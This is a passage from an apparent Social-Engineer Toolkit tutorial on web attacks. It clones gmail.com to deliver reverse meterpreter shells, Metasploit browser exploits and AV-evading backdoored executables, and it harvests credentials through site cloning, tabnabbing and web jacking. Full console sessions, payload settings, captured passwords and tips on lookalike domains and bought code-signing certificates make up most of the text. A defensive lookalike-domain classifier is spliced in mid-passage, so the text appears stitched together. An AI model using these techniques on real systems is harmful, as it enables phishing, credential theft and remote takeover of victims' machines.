[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:8081
[*] Starting the payload handler...
```

In this attack, we've set up our scenario to clone https://gmail.com and use the reverse meterpreter attack vector on port 443. We've used the backdoored executable to hopefully bypass anti-virus and set up Metasploit to handle the reverse connections. If you wanted to utilize an email with this attack vector you could edit config/set_config and change WEBATTACK_EMAIL=OFF to WEBATTACK_EMAIL=ON. When you get a victim to click a link or coax him to your website, it will look something like this:

As soon as the victim clicks run, you are presented with a meterpreter shell, and the victim is redirected back to the original Google site completely unaware that they have been compromised. Note that Java has updated their applet code to show the "Publisher" field on the applet as UNKNOWN when self-signing. In order to bypass this, you will need to register a company in your local state, and buy a code signing certificate in the company name.

```
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at Thu Sep 09 10:06:57 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
```

**Metasploit Browser Exploit Method**

The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the ability to clone the website and utilize browser-based exploits. Let's take a quick look at running a browser exploit through SET.

```
Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attack in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a
 metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a
 website that has a username and password field and harvest all the
 information posted to the website.

 The TabNabbing method will wait for a user to move to a different
 tab, then refresh the page to something different.

 The Man Left in the Middle Attack method was introduced by Kos and
 utilizes HTTP REFERER's in order to intercept fields and harvest
 data from them. You need to have an already vulnerable site and
 incorporate <script src="http://YOURIP/">. This could either be from a
 compromised site or through XSS.

 The Web-Jacking Attack method was introduced by white_sheep, Emgent
 and the Back|Track team. This method utilizes iframe replacements to
 make the highlighted URL link to appear legitimate however when clicked
 a window pops up then is replaced with the malicious link. You can edit
 the link replacement settings in the set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
99) Return to Main Menu

set:webattack> 2

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

Enter the browser exploit you would like to use [8]:

 1) Java AtomicReferenceArray Type Violation Vulnerability
 2) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
 3) Microsoft XML Core Services MSXML Uninitialized Memory Corruption
 4) Adobe Flash Player Object Type Confusion
 5) Adobe Flash Player MP4 "cprt" Overflow
 6) MS12-004 midiOutPlayNextPolyEvent Heap Overflow
 7) Java Applet Rhino Script Engine Remote Code Execution
 8) MS11-050 IE mshtml!CObjectElement Use After Free
 9) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
10) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
11) Internet Explorer CSS Import Use After Free (default)
12) Microsoft WMI Administration Tools ActiveX Buffer Overflow
13) Internet Explorer CSS Tags Memory Corruption
14) Sun Java Applet2ClassLoader Remote Code Execution
15) Sun Java Runtime New Plugin docbase Buffer Overflow
16) Microsoft Windows WebDAV Application DLL Hijacker
17) Adobe Flash Player AVM Bytecode Verification Vulnerability
18) Adobe Shockwave rcsL Memory Corruption Exploit
19) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
20) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
21) Microsoft Help Center XSS and Command Execution (MS10-042)
22) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
23) Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
24) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
25) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
26) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
27) Microsoft Internet Explorer isComponentInstalled Overflow
28) Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
29) Microsoft Internet Explorer Unsafe Scripting Misconfiguration
30) FireFox 3.5 escape Return Value Memory Corruption
31) FireFox 3.6.16 mChannel use after free vulnerability
32) Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads> 7

 1) Windows Shell Reverse_TCP             Spawn a command shell on victim and send back to attacker
 2) Windows Reverse_TCP Meterpreter       Spawn a meterpreter shell on victim and send back to attacker
 3) Windows Reverse_TCP VNC DLL           Spawn a VNC server on victim and send back to attacker
 4) Windows Bind Shell                    Execute payload and create an accepting port on remote system.
 5) Windows Bind Shell X64                Windows x64 Command Shell, Bind TCP Inline
 6) Windows Shell Reverse_TCP X64         Windows X64 Command Shell, Reverse TCP Inline
 7) Windows Meterpreter Reverse_TCP X64   Connect back to the attacker (Windows x64), Meterpreter
 8) Windows Meterpreter Egress Buster     Spawn a meterpreter shell and find a port home via multiple ports
 9) Windows Meterpreter Reverse HTTPS     Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS       Use a hostname instead of an IP address and use Reverse Meterpreter
11) Download/Run your Own Executable      Downloads an executable and runs it

set:payloads> 2
set:payloads> Port to use for the reverse [443]:

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 891 exploits - 484 auxiliary - 149 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15540 updated 23 days ago (2012.06.27)

resource (src/program_junk/meta_config)> use windows/browser/ms10_002_aurora
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started
```

Once the victim browses the website, it will look exactly like the site you cloned and then compromise the system.

```
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at Thu Sep 09 10:14:22 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp

C:\Documents and Settings\Administrator\Desktop>
```

**Credential Harvester Attack Method**

The credential harvester attack method is used when you don't want to specifically get a shell but perform phishing attacks in order to obtain usernames and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

```
 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
99) Return to Main Menu

set:webattack> 3

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

 1) Web Templates
 2) Site Cloner
 3) Custom Import
99) Return to Webattack Menu

set:webattack> 2

Email harvester will allow you to utilize the clone capabilities within SET to harvest credentials or parameters from a website as well as place them into a report.

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message. [*]

Press {return} to continue.

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
```

Once the victim clicks the link, they will be presented with an exact replica of gmail.com and hopefully be enticed to enter their username and password into the form fields.

As soon as the victim hits sign in, we are presented with the credentials and the victim is redirected back to the legitimate site.

```
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

172.16.32.131 - - [09/Sep/2010 10:12:55] "GET / HTTP/1.1" 200 -

[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7536764660264620804
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=nwAWNiTEqGc
POSSIBLE USERNAME FIELD FOUND: Email=thisismyuser
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=

[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
```

Also note that when you're finished, hit CONTROL-C and a report will be generated for you in two formats. The first is an HTML-based report; the other is XML if you need to parse the information into another tool.

```
^C[*] File exported to reports/2010-09-09 10:14:30.152435.html for your reading pleasure...
[*] File in XML format exported to reports/2010-09-09 10:14:30.152435.xml for your reading pleasure...

Press {return} to return to the menu.^C

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.

The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
99) Return to Main Menu

set:webattack> ^C

Thank you for shopping at the Social-Engineer Toolkit.

 Hack the Gibson...and remember...hugs are worth more than handshakes.

root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.
2010-09-09 10:14:30.152435.html  2010-09-09 10:14:30.152435.xml
root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.html
```

**Tabnabbing Attack Method**

The tabnabbing attack method is used when a victim has multiple tabs open. When the user clicks the link, the victim will be presented with a "Please wait while the page loads" message. When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are entered, they are harvested and the user is redirected back to the original website.

```
 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
99) Return to Main Menu

set:webattack> 4

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

 1) Web Templates
 2) Site Cloner
 3) Custom Import
99) Return to Webattack Menu

set:webattack> 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message. [*]

Press {return} to continue.

[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
```

The victim is presented with a webpage that says please wait while the page loads.

When the victim switches tabs, the website is rewritten; the victim then enters the credentials and they are harvested.

```
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-9060819085229816070
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=00-69E-Tt5g
POSSIBLE USERNAME FIELD FOUND: Email=sfdsfsd
POSSIBLE PASSWORD FIELD FOUND: Passwd=afds
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=

[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
```

**Man Left in the Middle Attack Method**

The man left in the middle attack utilizes HTTP REFERERs on an already compromised site or XSS vulnerability to pass the credentials back to the HTTP server. In this instance, if you find an XSS vulnerability and send the URL to the victim and they click, the website will operate 100 percent; however, when they go to log into the system, it will pass the credentials back to the attacker and harvest the credentials.

```
 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
99) Return to Main Menu

set:webattack> 5

***************************************************
 Web Server Launched. Welcome to the SET MLTM.
***************************************************

Man Left in the Middle Attack brought to you by:
Kyle Osborn - kyle@kyleosborn.com

Starting server on 0.0.0.0:80...
[*] Server has started
```

**Web Jacking Attack Method**

The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature in version 0.7.1. When you hover over the link, the URL will be presented as the real URL, not the attacker's machine. So for example if you're cloning gmail.com, the URL when hovered over would be gmail.com. When the user clicks the moved link, gmail opens and then is quickly replaced with your malicious webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.

```
 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
99) Return to Main Menu

set:webattack> 6

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

 1) Web Templates
 2) Site Cloner
 3) Custom Import
99) Return to Webattack Menu

set:webattack> 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message. [*]

Press {return} to continue.

[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
```

When the victim goes to the site, he/she will see the link below; note the URL in the bottom left of the browser, which is gmail.com.

When the victim clicks the link, he is presented with the following web page:

If you look at the URL bar, we are now at our malicious web server. In social-engineering engagements you want the page to be believable, and using a bare IP address is generally a bad idea. My recommendation, if you are doing a penetration test, is to register a name similar to the target's; for gmail you could use gmai1.com (notice the 1), or something similar that could mislead the user into thinking it is the legitimate site. Most of the time they won't even notice the IP, but a lookalike name is another way to ensure the attack goes through without a hitch. Once the victim enters a username and password in the fields, you will notice that we intercept the credentials.

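The gmai1.com trick above is exactly what a defender's brand-monitoring check looks for in new domain registrations or certificate-transparency logs. The classifier below is an added example, not part of SET or of this manual; the protected-domain list and the test names are constructed.

```python
"""Lookalike-domain classifier for web-jacking style phishing names.

Added example, not part of SET or of the manual above. PROTECTED is a
constructed list of domains a defender wants to watch for impersonation.
"""

PROTECTED = ["gmail.com", "google.com"]

# Character sequences that look alike in common browser fonts.
MULTI_CHAR = (("rn", "m"), ("vv", "w"))
SINGLE_CHAR = str.maketrans({"1": "l", "i": "l", "0": "o"})


def skeleton(domain: str) -> str:
    """Collapse visually confusable characters to one canonical form, so
    that gmai1.com, grnail.com and gmail.com all map to the same string."""
    d = domain.lower().strip(".")
    for multi, single in MULTI_CHAR:
        d = d.replace(multi, single)
    return d.translate(SINGLE_CHAR)


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert, delete, substitute), used for typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate: str, protected=PROTECTED):
    """Return (verdict, protected_domain_matched) for one observed domain.

    Verdicts, checked in this order:
      legitimate      exact match or a real subdomain of a protected domain
      homoglyph       same skeleton after confusable substitution (gmai1.com)
      typosquat       within edit distance 2 (gmial.com, gmail.co)
      brand-embedded  protected name appears inside a different registrable
                      domain (gmail.com.login-example.test)
      unrelated       none of the above
    """
    cand = candidate.lower().strip(".")
    for p in protected:
        if cand == p or cand.endswith("." + p):
            return ("legitimate", p)
    for p in protected:
        if skeleton(cand) == skeleton(p):
            return ("homoglyph", p)
    for p in protected:
        if levenshtein(cand, p) <= 2:
            return ("typosquat", p)
    for p in protected:
        if p in cand:
            return ("brand-embedded", p)
    return ("unrelated", None)


def triage(observed):
    """Run classify() over a batch of newly seen domains and keep only the
    ones that need a human look."""
    flagged = []
    for d in observed:
        verdict, matched = classify(d)
        if verdict != "legitimate":
            flagged.append((d, verdict, matched))
    return flagged
```
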
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
172.16.32.131 - - [09/Sep/2010 12:15:13] "GET / HTTP/1.1" 200 -
172.16.32.131 - - [09/Sep/2010 12:15:56] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7017428156907423605
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=0JsVTaj70sk
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT

Multi-Attack Web Vector

The multi-attack web vector is new in 0.7.1 and allows you to specify multiple web attack methods in order to perform a single attack. In some scenarios the Java Applet may fail but an Internet Explorer exploit would succeed; or perhaps both the Java Applet and the Internet Explorer exploit fail and the credential harvester succeeds. The multi-attack vector lets you turn the different vectors on and off and combine them all into one web page, so when the user clicks the link he is targeted by each of the attack vectors you specified. One thing to note: you cannot combine Tabnabbing, Credential Harvester, or Web Jacking with the Man Left in the Middle attack. Given how those vectors work, they should not be combined anyway. Let's take a look at the multi-attack vector. In this scenario I am going to turn on the Java Applet attack, the Metasploit client-side exploit, and the Web Jacking attack. When the victim browses to the site, he/she will need to click on the link and will then be hit with the credential harvester, the Metasploit exploit, and the Java Applet attack. I am going to intentionally select an Internet Explorer 7 exploit and browse using IE6, to demonstrate that if one method fails, we have others.

 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
 99) Return to Main Menu

set:webattack>7

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

 1) Web Templates
 2) Site Cloner
 3) Custom Import
 99) Return to Webattack Menu

set:webattack> 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*************************************************************]
 Multi-Attack Web Attack Vector
[*************************************************************]

 The multi attack vector utilizes each combination of attacks
 and allow the user to choose the method for the attack. Once
 you select one of the attacks, it will be added to your
 attack profile to be used to stage the attack vector. When
 your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

1. The Java Applet Attack Method (OFF)
2. The Metasploit Browser Exploit Method (OFF)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 1

Turning the Java Applet Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.

[*************************************************************]
 Multi-Attack Web Attack Vector
[*************************************************************]

 The multi attack vector utilizes each combination of attacks
 and allow the user to choose the method for the attack. Once
 you select one of the attacks, it will be added to your
 attack profile to be used to stage the attack vector. When
 your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

1. The Java Applet Attack Method (ON)
2. The Metasploit Browser Exploit Method (OFF)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 2

Turning the Metasploit Client Side Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.

[*************************************************************]
 Multi-Attack Web Attack Vector
[*************************************************************]

 The multi attack vector utilizes each combination of attacks
 and allow the user to choose the method for the attack. Once
 you select one of the attacks, it will be added to your
 attack profile to be used to stage the attack vector. When
 your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

1. The Java Applet Attack Method (ON)
2. The Metasploit Browser Exploit Method (ON)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 6

Turning the Web Jacking Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.

[*************************************************************]
 Multi-Attack Web Attack Vector
[*************************************************************]

 The multi attack vector utilizes each combination of attacks
 and allow the user to choose the method for the attack. Once
 you select one of the attacks, it will be added to your
 attack profile to be used to stage the attack vector. When
 your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

1. The Java Applet Attack Method (ON)
2. The Metasploit Browser Exploit Method (ON)
3. Credential Harvester Attack Method (ON)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (ON)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch):

Alternatively, you can use the "Tactical Nuke" option (option 7), which enables all of the attack vectors automatically. In this example you can see the flags change: the Java Applet, Metasploit Browser Exploit, Credential Harvester, and Web Jacking attack methods have all been enabled. To proceed, hit enter or use option 8.

Enter your choice one at a time (hit 8 or enter to launch):

What payload do you want to generate:

Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):

[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: no

Enter the browser exploit you would like to use [8]:

 1) Java AtomicReferenceArray Type Violation Vulnerability
 2) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
 3) Microsoft XML Core Services MSXML Uninitialized Memory Corruption
 4) Adobe Flash Player Object Type Confusion
 5) Adobe Flash Player MP4 "cprt" Overflow
 6) MS12-004 midiOutPlayNextPolyEvent Heap Overflow
 7) Java Applet Rhino Script Engine Remote Code Execution
 8) MS11-050 IE mshtml!CObjectElement Use After Free
 9) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
 10) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
 11) Internet Explorer CSS Import Use After Free (default)
 12) Microsoft WMI Administration Tools ActiveX Buffer Overflow
 13) Internet Explorer CSS Tags Memory Corruption
 14) Sun Java Applet2ClassLoader Remote Code Execution
 15) Sun Java Runtime New Plugin docbase Buffer Overflow
 16) Microsoft Windows WebDAV Application DLL Hijacker
 17) Adobe Flash Player AVM Bytecode Verification Vulnerability
 18) Adobe Shockwave rcsL Memory Corruption Exploit
 19) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
 20) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
 21) Microsoft Help Center XSS and Command Execution (MS10-042)
 22) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
 23) Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
 24) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
 25) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
 26) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
 27) Microsoft Internet Explorer isComponentInstalled Overflow
 28) Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
 29) Microsoft Internet Explorer Unsafe Scripting Misconfiguration
 30) FireFox 3.5 escape Return Value Memory Corruption
 31) FireFox 3.6.16 mChannel use after free vulnerability
 32) Metasploit Browser Autopwn (USE AT OWN RISK!)

